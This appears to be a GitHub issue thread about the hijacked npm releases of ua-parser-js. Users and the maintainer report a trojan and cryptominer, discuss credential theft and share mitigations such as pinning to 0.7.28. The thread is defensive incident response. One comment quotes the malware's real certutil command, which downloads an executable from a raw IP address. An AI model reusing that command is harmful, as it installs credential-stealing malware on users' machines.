ua-parser-js
ua-parser-js copied to clipboard
faisalman
Security issue: compromised npm packages of ua-parser-js (0.7.29, 0.8.0, 1.0.0) - Questions about deprecated npm package ua-parser-js
Hi!
See a warning at npm - https://www.npmjs.com/package/ua-parser-js - This package has been hijacked. Please revert to 0.7.28
First question - Can we use range ^0.7.28, or it is not safe?
Second question - Will you create a new package, or try to remove hijacked versions and continue update this package?
Ouch does that mean like there's malicious code in it or something?
@faisalman
I just update package and windows defender block "ceprolad.a" a trojan. I don't have any internet access at the same moment... The trojan try to execute in the cmd: "certutil -rulcache -f http://159.148.186.228/download/jsextension.exe jsextension.exe". The certutil -rulcacha -f download a .exe file.
Update - ^0.7.28 range is dangerous, 0.7.29 version already published.
We all need to fix 0.7.28 in our dependencies.
0.7.29 includes scripts that download and execute binaries. From the command-line arguments, one of them looks like a cryptominer, but that might be just for camouflage.
Revert back to 0.7.28 all greater version are infected. My computer was infected this morning when i updated my docusaurus version. https://twitter.com/DrocksAlex/status/1451543176779534342
NPM official flag: https://www.npmjs.com/package/ua-parser-js
The best solution is to publish the 0.7.30 version without the vulnerability. Then ^ will jump to the vulnerable version
Hi all, very sorry about this.
I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don't realize something was up, luckily the effect is quite the contrary).
I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0
I have sent a message to NPM support since I can't seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish) so I can only deprecate them with a warning message.
@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.
I think we should publish new versions above that this hijected versions.
Like: 0.7.30 0.8.1 1.0.1
I think we should publish new versions above that this hijected versions.
Like: 0.7.30 0.8.1 1.0.1
Little problem with that decision - it will be hard to remove this versions in a future.
So, ua-parser-js will need up version to 2.0.0, when want to push real updates
Extra carefulness required because it seems to be affecting linux machines as well, make sure the miner doesn't get installed in your servers & ci stuff
For now it seems to only hang in installing because the url containing the infection doesn't seem to be working, but it may not last
Linux users can use this command to see if the miner is running or not and stop it : ps -aux | grep jsextension
I think we should publish new versions above that this hijected versions. Like: 0.7.30 0.8.1 1.0.1
Little problem with that decision - it will be hard to remove this versions in a future.
So, ua-parser-js will need up version to 2.0.0, when want to push real updates
That's right but it's a safest method I think. You can continue with version 2.0.0 and users don't specify a specific version will not be affected.
@faisalman did you use the "Report malware" button? I don't know how quick NPM support usually is but I imagine they might pay attention to that.
Yes I've sent the report using that form, hope they can just be removed. Otherwise, I have to publish under new versions.
This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.
This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.
Does it? I'd have to change all my passwords.
This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.
You're right.. Ok then
This thing tries to steal saved passwords, cookies, and who knows what else. The sooner you can pull the plug the better, it doesn't matter if version numbers suffer a little.
Does it? I'd have to change all my passwords.
I've dropped the DLL it runs to a virustotal (before unplugging the ethernet): https://www.virustotal.com/gui/file/2a3acdcd76575762b18c18c644a745125f55ce121f742d2aad962521bc7f25fd/behavior It reads browser user data files and I've checked "files written" against my infected PC, it does look like a script to export OS credentials and a copy of cookies DB file from Chrome
We fixed it using this in our package.json :
"resolutions": { "**/ua-parser-js": "0.7.28" }
I think we should publish new versions above that this hijected versions.
Like: 0.7.30 0.8.1 1.0.1
Done. Thanks for the suggestion 👍
a solution that we're using to address this vulnerability is to set the resolutions in pacakge.json to use the last good version:
...},"resolutions": { "ua-parser-js": "0.7.28" },...
That resolution will come in handy when using a library that depends on the latest of ua-parser-js as opposed to using ua-parser-js directly in your package.json dependencies.
Please update the title of this issue to reflect more to the users with security issues
for information, this package is in use in at least 4 expo libs.
├─┬ @react-navigation/[email protected]
│ └─┬ [email protected]
│ └─┬ [email protected]
│ └── [email protected] deduped
├─┬ [email protected]
│ └── [email protected]
├─┬ [email protected]
│ └─┬ [email protected]
│ └─┬ [email protected]
│ └── [email protected] deduped
└─┬ [email protected]
└─┬ [email protected]
└── [email protected] deduped
for information, this package is in use in at least 4 expo libs.
├─┬ @react-navigation/[email protected] │ └─┬ [email protected] │ └─┬ [email protected] │ └── [email protected] deduped ├─┬ [email protected] │ └── [email protected] ├─┬ [email protected] │ └─┬ [email protected] │ └─┬ [email protected] │ └── [email protected] deduped └─┬ [email protected] └─┬ [email protected] └── [email protected] deduped
also in docusaurus
https://blog.sonatype.com/newly-found-npm-malware-mines-cryptocurrency-on-windows-linux-macos-devices
@faisalman Do you have 2FA enabled on your NPM acccount?
Yes..if you're a OSS dev you need 2FA, preferably NOT SMS based.
Your account recovery email should also be set up with 2FA, and your password manager of choice as well. Again not SMS based.
// Update
Here's a summary of what I was able to figure out on this incident based on the code and previous incidents of similar nature both in npm and RubyGems:
https://www.whitesourcesoftware.com/resources/blog/popular-javascript-library-ua-parser-js-compromised-via-account-takeover/
This code contains two malicious components:
a) a cryptocurrency mining tool (ref: https://bit.ly/3Ca9lw1) b) trojan software (ref: https://bit.ly/3B6uXIk) but only for Windows stealing credentials from browers
Both are really serious but the biggest impact is (probably) on the Windows users. Let me look into the wallet and check the malicious files in more detail...
A bit of a good news is, that majority of Windows antivirus software was able to identify and stop the trojan component:
It is still worth pointing out, that some previous incidents around crypto (mainly in RubyGems) had the miners modifying the registries on Windows making them start again after a system restart.
// Edit
No option to check activities on this, since Monero does not allow as free blockchain exploration as others:
Sorry, its not possible to find txs associated with normal addresses in Monero
A bit of a good news is, that majority of Windows antivirus software was able to identify and stop the trojan component:
They do now, but in first hours only few antiviruses on virustotal detected it.
It is still worth pointing out, that some previous incidents around crypto (mainly in RubyGems) had the miners modifying the registries on Windows making them start again after a system restart.
In my case it registered itself into %appdata%/Microsoft/windows/start menu/programs/startup